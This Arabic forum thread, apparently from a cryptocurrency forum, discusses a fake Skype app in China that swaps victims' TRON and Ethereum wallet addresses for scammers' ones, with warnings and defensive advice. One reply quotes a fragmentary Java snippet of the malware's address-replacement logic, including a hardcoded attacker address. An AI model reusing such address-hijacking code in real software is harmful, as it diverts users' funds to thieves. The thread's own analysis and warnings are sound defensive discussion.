قصة إحتيال لتطبيق إسكايب

[albon]

مرحبا بالجميع،

حدثت عملية احتيال جديدة منذ عدة أيام في الصين حيث قام المحتالون بتطوير تطبيق إسكايب زائفاً لسرقة مستثمري الكريبتو، حيث نجح المحتالون بهذا وفقا لأن التطبيقات الأساسية محظورة من قبل الصين وكما نعلم فإن إسكايب وتليجرام وواتس أب من ضمن أكثر التطبيقات الشائعة والمستخدمة عالمياً من تطبيقات التواصل، فقاموا بتطوير نسخة لتطبيق إسكايب زائفة وهذا التطبيق يحتوي على أداة okhttp3 المعدلة والخبيثة وبعد منح الأذونات لهذا التطبيق الزائف فإن الأداة الخبيثة تصل إلى الصور المخزنة والملفات ومعلومات الجهاز والمستخدم كأرقام الهاتف وإلى الرسائل وإذا وجد عناوين محافظ لعملة الترون أو الإثيريوم فإنه يقوم باستبدالها تلقائيا بعناوين محددة من قبل المحتالين مصممي هذا التطبيق الزائف وقد كشفت شركة تحليلات الأمان للعملات لرقمية SlowMist هذا الأمر، وقد تمكن المحتالون من سرقة فيما يتخطى 200 ألف دولار في أكثر من 120 معاملة وقد تم إدراج محافظ المحتالون إلى القائمة السوداء بواسطة هذه شركة الأمان هذه،



تنبيه: هذه القصة تجعل الجميع ينتبه من عدم تثبيت أى تطبيقات خارج المتاجر الرسمية سواء كانت مكركة او غير متاحة بالمتاجر او بها خصائص جذابة، فيمكن من بعد منحك بعض الاذونات لتطبيق زائف ما أن يتم اختراقك وتفقد العملات الرقمية التى تمتلكها بكل بساطة.

[1] https://cointelegraph.com/news/chinese-hackers-use-fake-skype-app-to-target-crypto-users-in-new-phishing-scam

[GxSTxV]

موضوع مهم لنا جميعا، الامر خطير لان التطبيق الزائف والخاص باختراق معلومات المستخدم الذي يقوم بتحميل التطبيقات خارج الموقع الرسمي على الحاسوب. تعددت طرق الاختراق وسرقة المحافظ لكن يبقى الامان من الشخص نفسه، من الضروري حسب رأيي لكن شخص لديه محفظة كريبتو ويتعامل بكميات كبيرة يستحسن استخدام حاسوب اخر جديد ويتصل بالانترنت الا عند التحويلات.

إذا وجد عناوين محافظ لعملة الترون أو الإثيريوم فإنه يقوم باستبدالها تلقائيا بعناوين محددة من قبل المحتالين

مالم افهمه في الموضوع هو كيف يتم استبدال رابط المحفظة، وما الفائدة من ئلك(

[albon]

أشكرك على أخى على تعليقك, نعم بالفعل يعد إستخدام حاسوب او هاتف آخر امر وقائى بدلاً من إستخدام الجهاز الرئيسيى الذى يحتوى على المحافظ وعلى رؤس الأموال والبيانات والمعلومات الشخصية المهمة.

مالم افهمه في الموضوع هو كيف يتم استبدال رابط المحفظة، وما الفائدة من ئلك(

لقطة الشاشة بالموضوع تبين الاكواد البرمجية الخبيثة للسورس كود التى تعمل على إستبدال سلاسل تنسيق العنوان, ففى حال وجود او إرسال عنوان محفظة لعملة الترون والإثيريروم المذكورة بالكود البرمجى فى الرسائل فإن الاداه الخبيثة تستبدال عنوان المحفظة الخاص بالضحية إلى عنوان محفظة المحتال تلقائياً.

يعتبر الامر قريب لتروجان Clippers (Clipboard hijackers) الذى يعمل على اختراق حافظة الضحية ويقوم بتعديل إى عناوين لمحافظ الضحية من خلال النسخ واللصق تلقائياً إلى عنوان المخترق.

[yhiaali3]

يعتبر الامر قريب لتروجان Clippers (Clipboard hijackers) الذى يعمل على اختراق حافظة الضحية ويقوم بتعديل إى عناوين لمحافظ الضحية من خلال النسخ واللصق تلقائياً إلى عنوان المخترق.

شكرا لك على التنبيه أخي، بالفعل هذه البرمجيات الخبيثة خطيرة.

بالنسبة لتروجان Clippers (Clipboard hijackers) أصيب به جهاز المحمول الخاص بي من حوالس سنتين أو ثلاثة ، هذا التروجان خطير جدا ويقوم باستبدال أي عنوان تقوم بنسخه إلى الحافظة إلى عنوان الهاكر وبالتالي أي عملية تحويل تقوم بها تذهب إلى عنوان الهاكر بدلا من عنوانك، وقتها كان هذا التروجان غير معروف كثيرا وقد عانيت الكثير حتى تمكنت من التخلص منه وأتذكر أنني كتبت موضوع حول هذا التروجان وطريقة التخلص منه.

أنا أصبت به من خلال زيارتي لبعض مواقع الويب المشبوهة، لذلك يجب الانتباه أيضا إلى هذه النقطة والأفضل تنصيب برنامح حماية من الفيروسات قوي ومحدث باستمرار.

[hg_away]

يبدوا بان ما سيتطيع الوصول اليه محدود حيث ان بعض الفيروسات بمجرد تثبيتها وفتح التطبيق وتطبيق المحفظة يختفي كل رصيدك والمبلغ الذي سرقوه بسيط مقارنه بالجهد لذلك فالاهم ان لا تثبت اي تطبيق من مصدر غير معروف وان كانت الخدمة محظورة في دولتك فاستخدم في بي ان لتحميلها من المتجر

[CryptoCuMan]

المحتال شخص ذكي , والاحتيال يعتمد على الهندسة الاجتماعية , لكن يجب منا جميعا اتباع جميع أدوات السلامة

[mikeywith]

وقد تمكن المحتالون من سرقة فيما يتخطى 200 ألف دولار في أكثر من 120 معاملة وقد تم إدراج محافظ المحتالون إلى القائمة السوداء بواسطة هذه شركة الأمان هذه،

لا اعتقد ان هدا الرقم صحيح, او على الاقل لايمكن معرفة ان كان هدا كامل المبلغ, ولا ادري لماذا هده المغالطة من قبل الشخص الذي كتب الخبر او شركة الامان فالكود هدا

Code:

public static String HandleSend(String msg, String messageID, String displayName) { Pattern patternTrx = Pattern.compile(" (T[a-zA-Z0-9]{33})");
Matcher matcherTrx = patternTrx.matcher(msg);
if (matcherTrx.find()) {
String copyTrxAddress = matcherTrx.group(1);
String trxFake = getRecTrxAddress (copyTrxAddress.concat("").concat(displayName)); if (trxFake == "-1") {
if (globalAddress != null) {
globalAddress.getOrDefault("TRX", "TJhqKzGQ3LzT91h53JoyAvMnnH5ETHWLQB"); NewString ClearString;
NewGetHttp.getRandAddress Sem (copyTrxAddress); NewGetHttp.isEmptyTRX();
trxFake NewString;
saveSendTrxAddress (trxFake.concat("").concat(displayName), copyTrxAddress); if (trxFake.length() != 34) {
}
} else {
return msg;

يقوم بمحاولة الحصول على عنوان جديد عبر NewGetHttp.getRandAddressSem وهدا على الاغلب اتصال بسيرفر اخر يملكه المخترق للحصول على عنوان جديد في كل عملية, وفقط في حال فشل الحصول على عنوان من ذلك الخادم فعندها يتم استخدام العنوان الافتراضي للسارق وهوا TJhqKzGQ3LzT91h53JoyAvMnnH5ETHWLQB.

مما يعني ان المبلغ المعلن عنه هوا فقط المحول للعنوانين الافتراضية اما باقي المبالغ فلا يمكن الوصول اليها لان العنواين المحولة لها قد تم انشائها بطريقة اخرى.

[GxSTxV]

تنوعت اشكال الاحتيال في  الاونة الاخيرة او بالاحرى اكتشافها، هذه الطريقة (Clipboard hijackers) تعتبر اقل تطويرا مقارنة ببرامج وتطويرات خبيرة وساعطبك مثال لي شخصيا؛ نسيت اني قمت بتحميل لعبة عبارة عن launcher فيه كود خبيث يقوم بسرقة كلمات البذرة مباشرة من المتصفح ومحفظة Metamask وعندما قمت بارسال مبلغ الى المحفظة بعد فترة من الوقت تفاجئت باختفاء الرصيد من المحقظة لانه بشكل الي وفوري قام بارساله الى محفظة المخترق التي تحتوي على الاف الدولارات من اموال الضحايا وهذا هو رابط الموضوع

بالعودة الى ما حدث في الصين فاللوم هنا يقع على محركات البحث التي لا تقوم بحظر المواقع التي يكون فيها ملفات ملغمة وتظهر في الصفحة الرئيسية. لا اظن ان الحل هو ايقاف المخترقين بل الحماية من هذه الطرق الجديدة في الاختراق.
اي برنامج او ملف خارج المصدر يعتبر مشكوك ويفضل عدم فتحه حتى لو كان الجهاز محمي ببرامج حماية لانه لن يقدر على التعرف عليه كفيروس.